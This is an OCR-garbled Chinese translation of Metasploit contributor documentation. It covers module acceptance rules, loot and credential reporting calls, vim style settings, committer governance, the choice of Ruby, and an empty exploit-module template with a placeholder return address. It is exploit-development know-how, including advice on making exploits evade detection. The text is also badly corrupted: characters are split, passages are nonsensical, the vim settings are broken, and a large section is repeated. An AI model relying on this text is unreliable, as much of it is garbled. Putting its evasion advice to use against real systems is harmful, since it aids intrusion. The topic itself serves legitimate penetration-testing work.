特别 是 在 涉及 新 的 攻击 方法 和 新 技术 时 。 


模块 应 该 通过 msftidy.rb 并 遵守 CONTRIBUTING.md 指 南 。 两 者 都 友 Metasploit 分 发 。 有 关 如 
何 解决 空白 问题 的 某 些 信息 ， 请 参考 ' 样式 提示 ”。 模块 应 该 有 一 个 明确 且 明 显 的 目标 : 
exploit 模 块 应 该 得 到 一 个 shell。post 模 块 应 该 导致 特权 升级 或 战利品 。Auxiliary 模 块 是 一 

个 “其 他 ”类别 ， 但 应 限于 一 些 定义 明确 的 任务 - 通常 是 收集 信息 以 启用 exploit 或 post 模 块 。 考 
虑 到 设置 多 个 有 效 载荷 的 复杂 性 ， 模 块 不 应 该 启动 其 他 模块 。 这 些 操作 通常 是 外 部 UI 的 自动 
化 任务 。 拒绝 服务 模块 应 该 是 不 对 称 的 ， 至 少 有 一 些 有 趣 的 功能 。 如 果 它 与 synflood 相 媲 
美 ， 则 不 应 包括 在 内 。 如 果 可 以 和 Baliwicked 相 媲美 ， 那 就 应 该 包括 在 内 。 瘟 旋 在 线 上 的 模 
块 ， 比 如 slowloris， 可 能 会 因为 一 些 理由 包含 在 之 中 。 模块 应 该 能 够 按照 预期 的 最 小 配置 运 
行 。 默 认 值 应 该 是 聪明 的 ， 通 常情 况 下 是 正确 的 。 所 有 内 存 地 址 〈 即 JMP ESP 或 ROP 小 工 
FL) 都 应 该 是 “目标 ?下 的 元 数据 的 一 部 分 ， 并 记录 下 来 〈 它 指向 哪些 指令 以 及 什么 DLL。 如 果 
攻击 是 针对 特定 硬件 〈 即 路 由 器 ，PLC 等 ) ， 或 针对 不 是 免费 的 软件 〈 并 且 没 有 可 用 的 试用 
版 /演示 版 ) ， 请 记 住 提 交 二 进 制 数 据 包 捕获 (pcap 格 式 )， 演 示 模 块 利 用 实际 工作 。 
用 字母 编码 器 来 避免 BadChar 分 析 。 将 有 效 载荷 中 的 EncoderType 字 段 设 置 为 避免 进行 丨 正 的 
BadChar 分 析 的 模块 将 被 拒绝 。 这 些 模块 在 现实 世界 中 几乎 总 是 不 可 靠 的 。 exploit rank 定 义 
可 以 在 exploit rank 页 面 找 到 


如 果 这 么 做 微不足道 的 话 ,exploit 模 块 应 该 实现 一 个 check 方 法 。 通 过 baners 或 网 络 协议 暴露 的 
版 本 ,如 果 有 可 用 的 补丁 更 改 此 版 本 ， 那 么 check 方 法 应 该 总 是 返回 . 


如 果 某 个 模块 (auxiliary 或 者 post) 从 受害 机 器 获得 某 种 信息 ， 则 应 使 用 以 下 一 种 (或 多 种 ) 方 
法 存储 该 数据 : 


* store loot() : : 用 于 存储 盗 窍 文件 (包括 文本 和 二 进 制 文件 ) 和 例如 ps -ef and 
ifconfig 命令 的 "屏幕 捕获 "。 文 件 本 身 不 ous forensic-level 级 别 的 完整 性 - 它们 可 
能 被 post 模 块 解析 为 渗透 测试 者 提取 相关 信 ， 
* report auth info() TATRA -MEAN LIEN 的 工作 凭证 。 例 如 ， 转 储 
本 地 SMB 散 列 的 模块 将 使 用 这 个 ， 就 像 读 取 用 户 名 的 模块 :特定 主机 和 服务 的 密码 组 合 一 
样 。 具 体 来 说 ， 只 是 I cu T o 


* report vuln() :使 用 特定 漏洞 的 Auxiliary 和 post 模 块 应 该 在 repost vuln 成 功 调用 .请 注 
意 ，exploit 模 块 自动 将 report_vuln 作 为 打开 一 个 会 话 的 一 部 分 不 需要 特殊 调用 

* report_note() :如 果 上 面 三 种 更 合适 ,模块 应 该 尽量 避免 report_note ,但 是 可 能 前 面 三 种 
不 是 合适 的 . report_note 应 该 总 是 设置 一 个 旧 式 风格 的 :type ,例如 domain.hosts 所 以 其 
他 模块 可 以 更 容易 在 数据 库 找 到 它们 


模块 应 该 利用 正常 的 Metasploit API ° 例如， 他 们 不 应 该 尝试 使 用 本 地 Ruby 创 建 自 己 的 TCP 套 
接 字 或 应 用 程序 协议 ， 而 应 该 通过 Rex 和 Rex::Proto 方 法 调用 套 接 字 。 这 确保 了 与 全 套 框架 功 
能 (如 pivoting 和 proxy chaining) 的 兼容 性 。 Web 应 用 程序 攻击 通常 是 不 喜欢 的 
(SQL,XSS，CSRF)， 除 非 模块 可 以 可 靠 地 导致 getshell 或 执行 某 种 有 用 的 信息 泄漏 。 即 使 在 
这 种 情况 下 ， 模 块 也 应 该 如 上 所 述 “ 正 常 工作 ”。Web 应 用 程序 攻击 应 该 仅 限于 流行 的 ,广泛 部 
署 的 应 用 程序 。 例 如 ， 针 对 在 CMS 机 器 上 产生 shell 的 受 欢迎 的 CMS 的 SQLi 模 块 将 是 受 欢迎 

的 .而 导致 私人 Facebook 配 置 文件 公开 的 模块 不 会 (Facebook 只 有 一 个 已 部 署 的 实例 ). Web; 
用 程序 攻击 应 该 实现 一 个 HttpFingerprint 常 量 。 模块 应 该 只 是 列 出 目标 你 实际 测试 exploit 中 
如 果 从 未 在 上 面 测试 ,尽量 避免 假设 它 可 以 工作 在 某 一 个 特定 系统 . 目标 条 目 上 方 的 注释 ， 指 示 
有 关 给 定 目标 (语言 包 ， 修 补 程序 级 别 等 ) 的 附加 信息 ,可 以 帮助 其 他 开发 人 员 创建 更 多 目标 并 
改进 模块 。 模 块 可 以 运行 未 经 修补 和 未 公开 的 漏 润 。 然 而 ，Rapid7 很 乐意 遵循 Rapid7 政 策 协 
助 披露 流程 。 此 策略 提供 了 从 联系 供应 商 到 exploit 被 释放 ,一 个 固定 的 90 天 时 间 ，Rapid7 员 工 
发 现 的 所 有 漏洞 均 遵 循 此 流程 。 无 论 披露 的 处 理 方式 如 何 ， 提 交 者 都 将 获得 该 漏洞 的 全 部 荣 
誉 和 最 终 的 利用 模块 。 


框架 增强 


一 般 来 说 ，Metasploit 框 架 的 新 功能 应 该 从 插件 开始 。 如 果 功 能 变 得 有 用 和 流行 ， 我 们 可 以 更 
密切 地 整合 它 ， 增 加 RPC API 暴 露 等 等 ， 但 是 在 此 之 前 它 应 该 经 过 社区 的 测试 。 自动 执 行 一 
系列 分 散 函 数 通 常 不 是 框架 的 责任 。 自 动 化 应 该 通过 API 完 成 (查看 Metasploit 
Community/Express/Pro, MSFGUI, 和 Armiage). 过 去 在 框架 自动 化 方面 的 努力 证 明了 这 一 

点 。 像 db_autopwn 和 browser_autopwn ,是 很 少 用 户 期 待 的 .通过 越 来 越 复杂 的 选项 和 参数 来 
配置 这 些 工具 变 成 了 一 场 焉 禁 。 自动 化 框架 很 容易 ， 也 应 该 保持 简单 ， 但 是 自动 化 本 身 应 该 
存在 于 资源 脚本 和 框架 本 身 的 其 他 外 部 前 端 控制 台 功能 应 该 以 漏洞 利用 和 安全 工具 开发 为 
重点 ， 以 漏洞 利用 开发 者 为 典型 用 户 。 最 终 用 户 应 该 指向 一 个 接口 ， 如 Community Edition X 
MSFGUI. 不 要 期 望 控制 台 的 用 户 友好 性 。 控 制 台 应 该 被 认为 是 Metasploit 的 调试 模式 ， 并 尽 
可 能 接近 裸 机 功能 。 外 部 工具 ， 例 如 msfpayload 和 msfvenom， 间 在 使 exploit 开 发 更 容易 和 锻 
炼 特定 技术 。 我 们 将 继续 接受 这 种 性 质 的 工具 以 包含 在 框架 中 ， 但 是 这 些 工 具 应 该 附 有 文 

档 ， 快 速 开始 的 指导 教程 以 及 其 他 有 用 的 文本 。 


弃 用 通知 | 


请 参阅 CONTRIBUTING.md 获 取 权 威 代码 指南 


样式 提示 
编辑 配置 


让 您 的 编辑 器 负 et ode tet i a 
用 vim 或 gvim 作 为 默认 的 文本 编辑 器 - 如 果 你 有 一 个 其 他 编辑 器 的 配置 ， 我 们 很 乐意 看 到 它 


vim 和 gvim 


将 以 下 设置 添加 到 .vimrc 将 使 得 符合 CONTRIBUTING.md 和 msftidy.rb 的 规则 变 得 相当 容易 。 
one > de X MR 36. T vim49 Janus Distribution 播 件 ， 这 一 切 都 是 为 你 自动 完成 的 。 但 
， 如 果 你 是 一 个 特殊 的 snowflake， 那 么 下 面 就 是 让 你 的 代码 格式 化 的 好 方法 。 


set shiftwidth-2 tabstop-2 softtabstop-2 

" textwidth affects ‘gq which is handy for formatting comments 
set textwidth-78 

" Metasploit requires spaces instead of hard tabs 

set expandtab 

" Highlight spaces at EOL and mixed tabs and spaces. 

hi Boguswhitespace ctermbg-darkgreen guibg-darkgreen 

match BogusWhitespace /\s\+$\|A\t\+ NAAA \+\t\+/ 


如 果 您 希望 这 些 设 置 仅 适 用 于 ruby 文 件 ， 则 可 以 使 用 自动 组 和 自动 命令 。 


if !exists("au loaded") 
let au loaded - 
augroup rb 
au FileType ruby set shiftwidth-2 tabstop-2 softtabstop-2 textwidth-78 
au FileType ruby set expandtab 
au FileType ruby hi BogusWhitespace ctermbg-darkgreen guibg-darkgreen 
au FileType ruby match BogusWhitespace /\s\+$\|[A\t\+ \+\|[4 \+\t\+/ 
augroup END 
endif 


您 也 可 以 使 用 ;set list 查看 所 有 空格 作为 不 同 的 字符 ， 以 便 更 容易 看 到 错误 的 空白 。 
Rubymine 

鉴于 切换 到 使 用 标准 的 Ruby 缩 进 ，RubyMine 不 再 需要 特殊 的 配置 。 生 活 在 双 个 空格 的 tab ! 
语法 和 大 写 


虽然 我 们 知道 世界 上 有 很 多 种 语言 ， 弹 Metasploit 主 要 是 用 美国 英语 开发 的 。 因 此 ， 模 块 中 的 
描述 语法 应 符合 美国 英语 惯例 。 这 样 做 不 仅 可 以 确保 大 多 数 Metasploit 用 户 的 易 用 性 ， 还 可 以 
帮助 自动 (和 手动 ) 翻译 成 其 他 语言 。 


标题 


s 


T HM ELA — MEE o EXEC KS IU] > HA 
阅 : http://owl.english.purdue.edu/owl/resource/592/01/ 


唯一 的 例外 是 函数 名 称 (4o'thisFunc()') 和 特定 的 文件 名 (如 thisfile.ocx) 。 应 该 当 为 模块 标 
题 ， 所 以 第 一 个 和 最 后 一 个 词 都 以 大 写字 母 开头 ， 因 为 这 是 一 个 msftidy.rb 检 查 。 


Metasploit 提 交 


术语 "Metasploit 提 交 者 ”是 指 可 以 直接 写 入 Rapid7 Metasploit-Framework 分 支 的 人 员 。 这 些 人 
是 可 以 将 改变 转移 到 框架 主要 分 支 的 人 。 但 是 ， 对 Metasploit 做 出 贡献 ， 没 有 必要 拥有 提交 权 
限 。 我 们 的 许多 代码 来 自 非 提交 者 。 我 们 鼓励 任何 人 分 支 Metasploit 项 目 ， 进 行 更 改 ， 修 复 错 
误 ， 并 通过 Pull Requests 通 知 核心 提交 者 有 关 这 些 更 改 。 Metasploit 开 发 环境 设置 指南 中 提 
供 了 最 全 面 的 入 门 流程 。 


现在 大 多 数 但 不 是 全 部 的 提交 者 都 是 Rapid7 员 工 。 我 们 渴望 维护 一 些 非 Rapid7 提 交 者 ， 原 因 
如 下 


e 由 于 其 维护 提交 者 权利 地 位 提高 和 社会 压力 增加 。 承 诺 者 倾向 于 贡献 更 多 ， 

。 承诺 者 往往 感 党 有 权 参 与 代码 审查 ， 帮 助 新 手 ， 并 且 通 常 在 更 大 的 开发 社区 中 成 为 积极 
的 榜样 。 

e 提交 者 更 有 可 能 从 事 他 们 可 能 不 会 考虑 的 任务 - 比如 写 文档 ， 传 播 ， 编 写 测 试用 例 ， 当 然 
还 有 代码 审查 。 

e 外 部 提交 者 可 以 帮助 保持 Metasploit 框 架 的 特性 ， 使 之 成 为 一 个 站 正 独立 的 开源 项 目 。 

e 从 历史 上 看 ，Metasploit 框 架 享有 公共 参与 者 的 好 处 (2012 年 的 大 部 分 时 间 除 外 ) 。 最 
终 ， 志 愿 服务 是 Metasploit 项 目的 核心 。Metasploit 社 区 建立 在 这 样 的 核心 信念 上 : 公开 
的 贡献 和 安全 问题 的 公开 讨论 对 整个 互联 网 和 整个 人 类 社会 都 有 很 大 的 好 处 。 通 过 授权 
社区 贡献 者 相互 帮助 ， 帮 助 新 人 展示 安全 漏洞 和 风险 ， 我 们 可 以 更 有 效 地 培养 一 个 优 
秀 ， 有 道德 的 信息 安全 从 业者 社区 ， 并 顺便 推动 Metasploit 框 架 达 到 更 高 的 质量 标准 。 


提交 者 做 什么 


Metasploit 提 交 者 的 主要 消 遗 是 代码 审查 。 提 交 者 倾向 于 审查 来 自 其 他 提交 者 和 更 广泛 的 
Metasploit 社 区 的 请 求 。 


提交 者 ， 尽 管 有 写 权 限 ， 但 往往 不 写 上 自己 的 代码 。 对 于 大 多 数 非 功能 性 更 改 ， 如 空白 修 
复 ， 注 释文 档 和 其 他 微小 更 改 ， 则 无 需 打 开 拉 取 请 求 ; 这 种 小 小 的 变化 一 天 发 生 几 次 。 HTH 
微 ， 重 大 和 史诗 般 的 变化 ， 提 交 者 必须 像 其 他 任何 人 一 样 打 开 请 求 。 这 样 做 的 理由 是 ， 至 少 
有 两 个 人 应 该 参与 这 样 的 变化 ， 以 便 一 个 以 上 的 人 知道 这 个 变化 和 不 止 一 个 人 看 过 了 这 个 代 
码 。 这 种 持续 不 断 的 代码 审查 对 于 Metasploit 的 持续 成 功 至 关 重 要 。 


拉 请 求 应 与 使 用 一 个 git merge -S --no-ff 合并 ,以 确保 始终 生成 合并 提交 ,并 且 您 的 合并 提交 
使 用 您 的 PGP 密 钥 签 名 。 应 该 避免 点 击 绿色 的 "合并 "按钮 ， 以 避免 代码 竞争 他 可 能 导致 悄悄 
的 通过 代码 审查 ， 

如 果 拉 取 请 求 被 拒绝 ， 那 么 在 拉 取 请 求 中 它 应 该 是 非常 清楚 的 ， 为 什么 它 被 拒绝 ， 对 下 一 次 
努力 指出 有 用 的 资源 。 大 多 数 人 不 会 经 常 致力 于 开源 代码 ， 所 以 当 有 人 这 样 做 的 时 候 ， 请 草 
重 他 们 的 努力 。 提 交 者 公 角 列表 在 这 里 。 


如 何 获得 提交 者 权利 


通过 提交 涉及 所 有 当前 提交 者 的 正式 投票 流程 ,通过 提交 者 邮件 列表 授予 。 投 票 记录 归档 ， 为 
当前 和 未 来 的 提交 者 带 来 好 处 。 


1. 任何 当前 的 提交 者 都 可 以 通过 写 一 封 邮件 到 邮件 列表 来 提名 任何 一 个 人 作为 潜在 的 提交 
者 。 提 名 人 一 般 不 应 该 通知 被 提名 人 她 已 经 被 提名 ， 直 到 获得 提名 人 的 赞成 票 。 提 名 者 
必须 为 这 个 提交 者 权利 提供 理由 ， 包 括 提名 者 的 电子 邮件 地 址 。 

2. 任何 当前 的 提交 者 可 能 会 否决 被 提名 人 的 任何 (或 没有 ) 理由 。 

3， 的 Metasploit Framework= E. X HD Moore > Tod Beardsley 和 James“egypt"Lee 都 必须 在 
一 周 之 内 通过 肯定 的 投票 确认 提名 人 人， 否则 提名 将 遭受 口袋 否决 。 

4. Metasploit [X & 3€ Wi (@egypt) 将 通知 被 提名 者 新 的 提交 权限 和 责任 ， 将 新 提交 者 添 
加 到 适当 的 ACL 组 和 邮件 列表 中 ， 并 通知 邮件 列表 已 经 成 功 完成 这 些 任务 。 以 这 种 方式 
引入 的 提交 者 将 拥有 公共 框架 存储 库 的 权限 。 


如 何 失 去 提交 权 


提交 者 的 权利 并 不 是 以 经 过 验证 的 代码 质量 为 基础 的 。 提 交 者 权利 是 现 有 的 提交 者 机 构 的 信 
任 声 明 ， 所 以 也 有 很 高 的 主观 标准 。 像 一 个 愉快 的 个 性 ， 面 对 拖 钓 时 保持 冷静 的 能 力 ， 避 免 
刑事 诉讼 以 及 提交 者 生活 的 其 他 方面 都 在 最 初 授予 提 交 访 问 权 时 起 作用 。 一 个 例外 是 简单 的 
不 活跃 和 缺乏 提交 。 不 活路 六 个 月 将 导致 一 个 工程 经 理 的 电子 邮件 提醒 提交 人 他 的 权利 和 风 
险 暴 露 ， 而 他 却 没有 使 用 它们 。 对 此 电子 邮件 的 回应 将 叶 致 权利 的 豆 失 ， 因 为 提交 者 显然 无 
法 访问 ， 可 能 已 经 被 次 用 。 


否则 ， 在 恶意 代码 或 恶意 代码 方面 违反 信任 的 条 款 ， 或 者 在 Metasploit 项 目 中 反映 不 佳 的 判断 
会 导致 提交 者 邮件 列表 开始 一 个 讨论 ， 这 可 能 会 导致 提交 者 权限 被 删除 。 


为 什么 是 ruby 


2005 年 左右 写 的 在 框架 的 开发 过 程 ,Metasploit 员 工 不 断 被 问 到 的 一 个 问题 是 为 什 
选择 Ruby 作 为 编程 语言 。 为 避免 个 别 回答 这 个 问题 ， 作 者 选择 在 这 份 文件 中 解释 他 们 的 理 
由 。 Ruby 编 程 语言 是 由 其 他 选择 选择 的 ， 比 如 python，perl 和 C ++ > » 因 有 很 多 。Ruby 被 选 
中 的 第 一 个 (也 是 主要 的 ) 原因 是 因为 它 是 Metasploit 员 工 喜 欢 写 的 语言 。 在 花费 时 间 分 析 其 
他 语言 并 考虑 过 去 的 经 验 之 后 ，Ruby 编 程 语言 被 发 现 提 供 简单 又 功能 强大 的 一 个 解释 型 语 
。Ruby 提 供 的 反射 和 面向 对 象 方面 是 非常 适合 框架 要 求 的 东西 。 框 架 对 代码 重用 的 自动 化 
构造 的 需求 是 决策 过 程 中 的 一 个 关键 因素 ， 也 是 perl 不 太 适 合 提供 的 东西 之 一 . 最 重要 的 
是 ， 这 个 语法 是 非常 简单 的 ， 并 且 提 供 了 与 其 他 更 被 接受 的 语言 相同 的 语言 特性 ， 比 如 perl 。 
Ruby 被 选中 的 第 二 个 原因 是 因为 它 支持 线程 平台 . 虽然 在 这 个 模式 下 框架 的 开发 过 程 遇 到 了 一 
些 限 制 ， 但 是 Metasploit 的 工作 人 员 已 经 看 到 了 在 2.X 分 支 上 显 着 的 性 能 和 可 用 性 改进 。 未 来 
版 本 的 Ruby (1.9& 5|) 将 使 用 原生 线程 来 支持 现 有 的 线程 API， 解 释 器 被 编译 的 操作 系统 将 
解决 当前 实现 中 存在 的 一 些 问 题 (例如 允许 使 用 阻塞 操作 ) . 与 此 同时 ， 已 经 发 现 现 有 的 线程 
模型 与 传统 的 fork 模 型 相 比 优越 得 多 ， 特 别 是 在 缺乏 像 Windows 这 样 的 本 地 fork 实 现 的 平台 
Ło Ruby 被 选中 的 另 一 个 原因 是 因为 Windows 平 台 支 持原 生 解 释 器 的 存在 。 虽 然 perl 有 一 个 
cygwin 版 本 和 一 个 ActiveState 版 本 ， 但 都 受到 可 用 性 问题 的 困扰 。Ruby 解 释 器 可 以 在 
Windows 上 本 地 编译 和 执行 ， 这 大 大 提高 了 性 能 。 此 外 ， 解 释 器 也 非常 小 ， 如 果 有 和 错误， 可 
以 很 容易 地 修改 。 Python 编 程 语 言 也 是 一 种 语言 候选 。Metasploit 员 工 选择 Ruby 而 不 是 
python 的 原因 是 由 于 几 个 不 同 的 原因 。 主 要 原因 是 一 些 python 强 加 的 语法 上 的 烦恼 ， 比 如 块 
缩 进 。 虽 然 许多 人 会 认为 这 种 方法 的 好 处 ， 但 Metasploit 的 一 些 工作 人 员 认 为 这 是 一 个 不 必要 
。Python 的 其 他 问题 围绕 着 父 类 方法 调用 的 限制 和 解释 器 的 向 后 兼容 性 。C/C ++ 编 
明 语 言 也 被 认 丨 考虑 过 了 ， 但 最 终 很 明显 ， 试 图 用 非 解释 语言 来 部 署 一 个 可 移植 和 可 用 的 框 
架 是 不 可 行 的。 而 且 , 选 择 这 种 语言 的 开发 时 间 很 可 能 会 长 得 多 。 即使 框架 的 2.x 分 支 已 经 相当 
成 功 ，Metasploit 的 工作 人 员 也 遇 到 了 一 些 perl 的 面向 对 象 编程 模型 的 限制 和 上 烦恼， 或 者 缺乏 
的 烦恼 . ni 是 许多 发 行 版 默认 安装 的 一 部 分 ,这 并 不 是 说 Metasploit 的 工作 人 员 觉 得 这 样 
就 值得 绕 过 选择 。 最 后 ， 选择 一 个 为 框架 贡献 最 大 的 人 所 享有 的 语言 ， 语 言 最 终 选 择 了 
Ruby ° 


wh 


样式 提示 
编辑 配置 


让 您 的 编辑 器 负 et ode tet i a 
用 vim 或 gvim 作 为 默认 的 文本 编辑 器 - 如 果 你 有 一 个 其 他 编辑 器 的 配置 ， 我 们 很 乐意 看 到 它 


vim 和 gvim 


将 以 下 设置 添加 到 .vimrc 将 使 得 符合 CONTRIBUTING.md 和 msftidy.rb 的 规则 变 得 相当 容易 。 
one > de X MR 36. T vim49 Janus Distribution 播 件 ， 这 一 切 都 是 为 你 自动 完成 的 。 但 
， 如 果 你 是 一 个 特殊 的 snowflake， 那 么 下 面 就 是 让 你 的 代码 格式 化 的 好 方法 。 


set shiftwidth-2 tabstop-2 softtabstop-2 

" textwidth affects ‘gq which is handy for formatting comments 
set textwidth-78 

" Metasploit requires spaces instead of hard tabs 

set expandtab 

" Highlight spaces at EOL and mixed tabs and spaces. 

hi Boguswhitespace ctermbg-darkgreen guibg-darkgreen 

match BogusWhitespace /\s\+$\|A\t\+ NAAA \+\t\+/ 


如 果 您 希望 这 些 设 置 仅 适 用 于 ruby 文 件 ， 则 可 以 使 用 自动 组 和 自动 命令 。 


if !exists("au loaded") 
let au loaded - 
augroup rb 
au FileType ruby set shiftwidth-2 tabstop-2 softtabstop-2 textwidth-78 
au FileType ruby set expandtab 
au FileType ruby hi BogusWhitespace ctermbg-darkgreen guibg-darkgreen 
au FileType ruby match BogusWhitespace /\s\+$\|[A\t\+ \+\|[4 \+\t\+/ 
augroup END 
endif 


您 也 可 以 使 用 ;set list 查看 所 有 空格 作为 不 同 的 字符 ， 以 便 更 容易 看 到 错误 的 空白 。 
Rubymine 

鉴于 切换 到 使 用 标准 的 Ruby 缩 进 ，RubyMine 不 再 需要 特殊 的 配置 。 生 活 在 双 个 空格 的 tab ! 
语法 和 大 写 


虽然 我 们 知道 世界 上 有 很 多 种 语言 ， 弹 Metasploit 主 要 是 用 美国 英语 开发 的 。 因 此 ， 模 块 中 的 
描述 语法 应 符合 美国 英语 惯例 。 这 样 做 不 仅 可 以 确保 大 多 数 Metasploit 用 户 的 易 用 性 ， 还 可 以 
帮助 自动 (和 手动 ) 翻译 成 其 他 语言 。 


标题 


s 


T HM ELA — MEE o EXEC KS IU] > HA 
阅 : http://owl.english.purdue.edu/owl/resource/592/01/ 


唯一 的 例外 是 函数 名 称 (4o'thisFunc()') 和 特定 的 文件 名 (如 thisfile.ocx) 。 应 该 当 为 模块 标 
题 ， 所 以 第 一 个 和 最 后 一 个 词 都 以 大 写字 母 开头 ， 因 为 这 是 一 个 msftidy.rb 检 查 。 


4a fF] FF 36 5 — ^* exploit 


exploit A E iE 65 3j X 4E 3j fa Sc ER TR ZR Hb 4E 8] ARES, 它 是 关于 你 对 于 正在 调试 的 应 用 
程序 如 何 处 理 输入 以 及 如 何 通 过 操作 来 获得 控制 权 的 正确 理解 没 错 ， 关 键 字 是 “调试 "。 你 的 
binjitsu( 逆 向 工程 ), 凌 正 的 功夫 在 哪里 。 但 是 ， 如 果 你 的 目标 不 仅仅 是 弹出 一 个 计算 器 ， 而 是 
实际 上 想 要 武器 化 ， 维 持 和 提供 实际 应 用 ， 你 需要 一 个 开发 框架 。 Metasploit 就 是 这 样 开发 
的 。 这 个 框架 是 免费 的 ,开源 ,由 世界 各 地 的 研究 人 员 积 极 贡 献 。 所 以 当 你 编写 Metasploit 漏 洞 
的 时 候 ， 你 不 必 担 心 任何 依赖 性 问题 ， 或 者 版 本 错误 ， 或 者 没有 足够 的 有 效 载荷 供 不 同 的 渗 
透 场景 选择 ， 等 等 。 你 需要 思考 的 就 是 专注 于 构建 这 个 漏洞 利用 ， 而 不 是 别 的 。 


计划 你 的 模块 


与 编写 概念 证 明 不 同 ， 当 您 编写 Metasploit 模 块 时 ， 您 需要 考虑 用 户 如 何在 现实 世界 中 使 用 
它 。 隐 藏 通常 是 一 个 重要 的 考虑 因素 。 您 的 exploit 可 以 在 不 丢弃 文件 的 情况 下 执行 代码 吗 ? 输 
入 能 看 起 来 更 随机 ,通过 更 多 不 同 的 检测 ?如 何 混淆 ? 它 是 否 产生 不 必要 的 流量 ? 它 能 更 稳定 而 
不 会 造成 系统 崩溃 等 等 . 另外 ， 请 尽量 准确 地 考虑 可 利用 的 需求 。 通 常 ,一 个 bug 是 特定 于 一 系 
列 的 版 本 .甚至 是 build. 如 果 你 不 能 自动 检查 ,你 至 少 需要 在 描述 中 提 到 它 .您 的 一 些 漏 洞 利用 技 
术 也 可 能 是 特定 于 应 用 程序 的 . 就 像 ,您 可 以 利用 应 用 程序 中 的 特定 行为 以 您 希望 的 方式 生成 堆 
分 配 ， 但 是 在 较 新 版 本 中 可 能 会 更 混乱 ,因此 会 给 您 带 来 一 些 稳定 性 问题 . 是 否 需 要 第 三 方 组 件 
才能 工作 ， 其 至 可 能 不 会 被 所 有 人 安装 ? 即使 是 这 样 ， 是 否 经 常 修改 组 件 ， 可 能 会 使 您 的 沁 
ARATE? 要 知道 ,在 现实 世界 中 ,你 的 利用 可 能 会 以 很 多 不 同 的 方式 打 断 或 失败 .在 开发 和 
测试 阶段 ,你 应 该 尝试 找 出 并 修复 它 ,在 学 习 困 难 的 方式 之 前 . 


rank 


正如 你 所 看 到 的 ， 可 靠 性 对 于 Metasploit 来 说 很 重要 ， 我 们 试图 对 用 户 更 加 友好 。 我 知道 你 在 
想 什 么 :“ 好 吧 ， 如 果 他 们 正在 利用 漏洞 ， 他 们 应 该 明白 它 是 如 何 运 作 的 ， 所 以 他 们 知道 自己 
正在 陷入 困境 。" 在 完美 的 世界 里 ， 是 的 。 了 解 漏洞 的 工作 方式 或 者 exploit 的 工作 方式 只 会 使 
用 户 受 益 ， 但 是 你 知道 ， 我 们 并 不 是 生活 在 完美 的 世界 。 如 果 您 正在 进行 渗透 测试 ， 那 么 不 
可 能 总 是 找到 时 间 重 新 创建 务 受 攻击 的 环境 ， 分 割 exploit 到 最 基本 的 形式 来 调试 正在 发 生 的 事 
情 ， 然 后 再 进行 测试 。 你 可 能 有 一 个 紧张 的 日 程 安排 ， 打 入 一 个 大 型 的 网 络 ， 所 以 你 需要 小 
心 使 用 你 的 时 间 。 正 因为 如 此 ， 至 少 对 模块 有 很 好 的 描述 和 很 好 的 参考 。 当 然 ， 可 以 信任 的 
rank 系 统 。 Metasploit 框 架 有 七 个 不 同 的 rank 来 表明 漏洞 的 可 靠 性 。 请 参阅 漏洞 利用 rank 了 解 
更 多 详情 。 


模板 


如 果 你 已 经 读 了 这 么 多 ， 我 们 认为 你 是 相当 的 印象 深刻 .因为 要 消化 很 多 .你 可 能 想 知 道 为 什么 
我 没有 分 享 S m Jg * dried o IH JEA 3 RUE XT R8 UP AA o RIA iX — 2 AR 
们 不 应 该 告诉 你 如 何 写 一 个 利用 . 我 们 到 目前 为 止 所 做 的 是 希望 你 的 心态 正确 ,成 为 安全 社区 的 
Mp dei 1 用 开发 者 意味 着 什么 , 剩 下 的 更 多 的 是 如 何 使 用 我 们 的 mixins 构 建 exploit. 7f 

， 有 很 多 mixin， 所 以 不 可 外 g 在 一 个 页 面 中 浏览 所 有 的 ， 所 以 你 必须 阅读 API 文 档 , 现 有 的 代 
码 示例 ,或 者 寻找 更 多 的 wiki 页 面 ,我 们 已 经 写 了 特定 的 mixin。 例如 ， 如 果 您 正在 寻找 关于 如 何 
与 HTTP 服 务 器 交互 的 文章 ， 您 可 能 会 对 以 下 内 容 感 兴趣 : 如 何 使 用 HTTPCIlient 发 送 HTTP 请 
求 。 如 果 您 对 浏览 器 漏洞 利用 感 兴趣 ， 请 务必 查看 : 如 何 使 用 Sodio see sae 写 浏览 
器 漏洞 利用 程序 等 但 是 ， 当 然 ， 开 始 你 很 可 能 需要 一 个 模板 来 处 理 ， 在 这 里 。 我 们 还 将 解释 
如 何 填写 必 填 字段 


THÉ 
4 This module requires Metasploit: http://metasploit.com/download 
4 Current source: https://github.com/rapid7/metasploit - framework 
THE 


require 'msf/core' 


class MetasploitModule < Msf::Exploit::Remote 
Rank - NormalRanking 


def initialize(info={}) 
super(update info(info, 


'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]", 
'Description' => %q{ 

Say something that the user might need to know 
}, 
'License' => MSF LICENSE, 
'Author' -» [ 'Name' ], 
'References' => 

[ 'URL', "nd ] 

'Platform' => 'win', 
'Targets' => 


[ 


[ 'System or software version', 


"Ret' => 0x41414141 £ This will be available in '"target.ret^ 


j 
] 
], 
'Payload' => { 
'BadChars' => "\x00" 
3 
'Privileged' -» false, 


'DisclosureDate' => "", 
'DefaultTarget' => 0)) 


def check 
# For the check command 


def exploit 
# Main function 


Name 字 段 应 以 供应 商 名 称 开头 ， 后 面 跟 着 软件 。 理 想 情况 下 ，“Root Cause" 3 EC & 48 RIM 
革 误 的 组 件 或 功能 。 最 后 ， 模 块 正 在 利用 的 漏洞 类 型 。 在 Description 字段 应 该 解释 模块 做 什 
么 ， 什 么 事情 要 留意 ， 具 体 要 求 ， 多 多 益 善 。 目 标 是 让 用 户 了 解 他 所 使 用 的 内 容 ， 而 不 需要 
实际 读 取 模 块 的 源 代 码 并 找 出 结果 。 相 信 我 ， 他 们 中 的 大 多 数 人 不 会 。Author 字段 是 你 的 名 
字 。 格 式 应 该 是 "名称 ”。 如 果 你 想 在 那里 有 你 的 Twitter ， 留 下 它 作为 一 个 注释 ， 例 如 :名 称 # 
handle" References 字 段 是 与 漏洞 或 exploit 相 关 的 参考 数组 。 例 如 :咨询 ,博客 文章 等 .确保 您 使 
用 已 知 的 引用 标识 符 - 请 参阅 Metasploit 模 块 引 用 标识 符 以 获取 列表 。 该 Platform 字段 表示 所 
支持 的 平台 ， 例 如 : win, linux, osx, unix, bsd. targets 字 段 是 一 个 你 的 exploit 是 针对 的 系统 ,应 
用 ,设置 或 者 特殊 设置 的 数组 .第 二 个 元 素 整 个 数组 是 你 储存 目标 的 特殊 元 数据 的 位 置 .例如 特定 
偏 移 量 ,小 工具 ,ret 地 址 等 . 当 用 户 选择 目标 时 ， 元 数据 将 被 加 载 并 跟踪 “target index” > #7 Via 
